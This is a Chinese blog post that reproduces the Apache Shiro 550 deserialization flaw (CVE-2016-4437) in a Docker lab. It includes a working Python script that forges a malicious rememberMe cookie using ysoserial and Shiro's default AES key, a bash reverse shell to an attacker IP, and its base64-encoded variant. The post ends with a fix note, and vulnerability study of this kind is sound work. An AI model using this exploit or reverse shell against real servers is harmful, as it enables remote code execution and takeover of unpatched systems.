Apache Shiro反序列化漏洞复现(Shiro550,CVE-2016-4437)

最新推荐文章于 2024-05-19 13:41:05 发布
最新推荐文章于 2024-05-19 13:41:05 发布
阅读量8.9k 收藏 22
点赞数 6
分类专栏: 复现漏洞 文章标签: Apache shiro 漏洞复现 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/105748304
版权
Shiro是什么东西?

  • Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理

  • shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
    原理解释https://www.freebuf.com/vuls/178014.html

什么是硬编码:
硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。

漏洞位置

http 请求包 cookie 中的 rememberMe 参数。
该漏洞对shiro<=1.2.4的版本有影响。

攻击流程图

在这里插入图片描述

环境准备:

1.漏洞环境

  • docker漏洞镜像
  • 或者使用vulhub提供的环境

2.攻击准备的工具

  • 安装python中的pycrypto
  • 执行攻击的python脚本
  • 安装MVN(如果安装失败,可以直接下载jar文件使用)
  • 安装java反序列化payload集成包ysoserial

安装pycrypto
sudo pip3 install pycrypto(19kali自带py3)

安装MVN (注:安装mvn需要在jdk已经安装的前提下,kali默认有安装。
sudo apt install maven
验证 mvn –version
在这里插入图片描述

安装ysoserial的jar文件

root@kali:~# git clone https://github.com/frohoff/ysoserial.git
root@kali:~# cd ysoserial
root@kali:~/ysoserial# mvn package -DskipTests 
(但这一步我出现了问题,处理了很久也没办法解决)

最后解决的方法是直接下载ysoserial-0.0.6-SNAPSHOT-BETA-all.jar这个jar的文件,然后上传到ysoserial/target的目录下,准备的脚本也放到同一目录下(test.py)
在这里插入图片描述
python的攻击脚本,因为靶机环境是利用链2,所以用到CommonsCollections2这条链去构造,但是实战环境下,最好还是要测试出目标机子正确的key和利用链才行。

import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-BETA-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)
docker漏洞环境的安装
获取docker镜像
Docker pull medicean/vulapps:s_shiro_1

重启docker
systemctl start docker

启动环境把8080端口改为8081端口
docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
进攻复现

攻击机ip为158,靶机为144

此时漏洞环境已经搭建成功,如下所示:
攻击机192.168.10.158访问靶机144并抓包可看到有rememberme字样的cookie

在这里插入图片描述

反弹命令进行加密http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/192.168.10.158/1234 0>&1
加密后如下

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE1OC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

注意这里的脚本和jar文件是同一个目录下的,虽然有WARNING警告,但不影响tmp目录下生成remember cookie值
在这里插入图片描述
切换到tmp目录即可看到生成的cookie
在这里插入图片描述
注意这个伪造的cookie值需要复制到响应包有remember值的包发送才可能得到反弹shell,我也尝试过在漏洞页面的其他包进行伪造cookie值发送,是得不到反弹shell的
在这里插入图片描述
同时攻击机多开命令框进行nc的一个端口监听nc -lvp 1234,然后再发送伪造的cookie值
在这里插入图片描述
点击发送伪造的包,此时就能获得靶机的反弹shell
在这里插入图片描述

该漏洞的修复方法:

升级shiro到1.2.5及以上,并且不要使用一些已经被公开的密钥,要利用官方提供的方法生成密钥

努力的学渣'#
关注
  • 6
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2775
CVE-2016-4437 Shiro反序列化漏洞复现
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7623
shiro -550 反序列化(一)
shiro-550漏洞复现CVE-2016-4437
热门推荐
ATpiu的博客
03-22 1万+
漏洞概述 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 影响范围 Apache Shiro版本<=1.2.4 漏洞复现 使用vulhub起shiro对应环境 gadget使用CommonsBeanut...
shiro反序列化漏洞复现CVE-2016-4437
最新发布
m0_70349048的博客
05-19 379
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
good good study
03-28 9555
Shiro 1.2.4 反序列化漏洞
ShiroApache Shiro 默认密钥致命令执行漏洞CVE-2016-4437)的解决方案
No8g攻城狮的博客
12-07 5079
Apache Shiro 默认密钥致命令执行漏洞CVE-2016-4437)的解决方案
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
Shiro反序列化漏洞检测工具
01-05
1. **升级Shiro版本**:确保Shiro框架的版本高于1.2.4,因为从1.2.5开始,Apache Shiro已经修复了这个反序列化漏洞。 2. **禁用不必要的序列化**:避免在不受信任的输入上进行反序列化,尤其是在处理网络数据时。 3....
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具.zip
12-23
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具 Shiro_exploit Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key,...
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。
ApacheShiro复现记录1
08-08
ApacheShiro复现记录1
【网络安全---漏洞复现shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4369
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
shiro-反序列化漏洞
weixin_54217950的博客
07-26 6404
shiro反序列化漏洞
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
weixin_60719780的博客
02-11 1165
Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。
shiro反序列化漏洞
qq_41696518的博客
06-27 1483
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe。
Shiro-550 漏洞复现
qq_46440393的博客
03-15 2142
开始时间:2022/3/14 14:15 1、什么是shiroApache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 2、shiro 可以用来干什么? 三个核心组件:Subject, SecurityManager 和 Realms. Subject:即“当前操作用户”。但是,在Shiro中,Subject这一概念并不仅仅指人
shiro反序列化漏洞的原理和复现
m0_67391907的博客
08-24 629
因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。在cookie后边加上rememberMe=1,如果回复包出现rememberMe=deleteMe,说明他就是shiro框架。(1)开启环境,抓包判断是否是shiro框架。五、shiro反序列化漏洞修复
shiro反序列化漏洞复现
07-28
Apache Shiro反序列化漏洞是指攻击者可以利用Shiro框架中的反序列化漏洞,通过构造恶意的序列化数据,来执行任意代码或者获取敏感信息的漏洞。攻击者可以通过发送恶意请求或者利用其他漏洞来触发该漏洞,从而实现攻击目的。为了防止该漏洞的利用,建议及时更新Shiro框架版本,并加强对系统的安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值